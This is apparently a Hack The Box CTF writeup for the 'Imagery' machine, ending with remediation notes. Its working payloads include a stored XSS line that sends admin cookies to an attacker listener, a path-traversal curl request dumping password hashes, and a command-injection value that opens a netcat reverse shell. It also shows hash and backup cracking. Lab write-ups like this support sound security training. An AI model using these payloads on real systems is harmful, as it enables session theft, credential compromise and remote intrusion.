Skip to content
Check out my YouTube channel & hit Subscribe for more Red Team content! 👉 Join us on Youtube
🔥 Limited Time Offer: Get my ebook Inside the Mind of a Penetration Tester and receive an exclusive HTB Fullhouse Pro Lab writeup as a bonus! Grab it here

Imagery — HTB Writeup

Platform: Linux
IP: 10.129.165.87
Difficulty: Medium
Author: NoSec

wanna go deeper? unlock short videos & early root chains by joining backdoor crew

💀 join the backdoor crew

Recon – Nmap

nmap -sVC 10.129.165.87

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.7p1 Ubuntu 7ubuntu4.3 (Ubuntu Linux; protocol 2.0)
8000/tcp open  http    Werkzeug httpd 3.1.3 (Python 3.12.7)
|_http-title: Image Gallery
|_http-server-header: Werkzeug/3.1.3 Python/3.12.7
  • 22/tcp – SSH
  • 8000/tcp – HTTP (Werkzeug, Python 3.12.7)

The web runs an Image Gallery application.

The bug report page contains stored XSS. Start a simple HTTP server to capture callbacks:

python3 -m http.server 4444

Submit this payload in a bug report:

<img src=x onerror=fetch('http://<YOUR-IP>:4444/?pwned='+document.cookie)>

When the admin opens the report the admin session cookie is exfiltrated to your listener.

LFI on the admin endpoint

With the stolen admin cookie you can call the admin log endpoint which reads files based on log_identifier:

COOKIE="session=ADMIN_COOKIE"

Example:

curl -s -H "Cookie: $COOKIE" \
 "http://10.129.184.125:8000/admin/get_system_log?log_identifier=../../../../home/web/web/db.json" | jq .

This reveals users and password hashes.

Hash cracking

Save the hash locally:

echo '2c65c8d7bf<HASH>' >> hashes.txt

Crack with John:

john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

After cracking, use the credentials on the webapp.

Webshell – Command Injection in image transform

As a normal user (testuser) upload an image, intercept the transform/crop request in Burp, and modify the height parameter:

"height":"100; busybox nc YOUR-IP 4444 -e /bin/sh; echo"

Start a listener:

nc -lvnp 4444

Trigger the transform and obtain a web user shell.

Pivot to mark – backup bruteforce

From the web shell enumerate backups:

ls -la /var/backup

Find:

web_20250806_120723.zip.aes

Download the archive to your attacker host and brute-force it (custom script / pyAesCrypt loop). Once decrypted, extract the old db.json which contains historical user hashes (including mark).

Crack the mark hash offline:

echo '<mark_hash>' >> hashes.txt
john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

User access – su mark

From the web shell, switch to mark:

su mark

User flag obtained.

Summary

  • Stored XSS → admin cookie theft
  • LFI via admin log endpoint → db.json dump
  • Hash cracking → testuser access
  • Command injection in image transform → webshell
  • Backup bruteforce → historical db.json with mark hash
  • Hash cracking → mark credentials → su mark → user flag

Notes & remediation

  • Sanitize admin-facing inputs; apply CSP and HttpOnly on cookies.
  • Canonicalize and whitelist file reads; reject .. traversals.
  • Never build shell commands with untrusted input — use library APIs.
  • Isolate image processing and drop privileges for processors.
  • Encrypt and protect backups with proper key management.

🔐 Root part is only available in the private Telegram group while the box is active in Season 8. 👉 Join for the full writeup, extra tips and exclusive content: 📡 https://t.me/nosecpwn

☕ invite me for a coffee so i don’t fall asleep writing the next writeup

💻 support nosec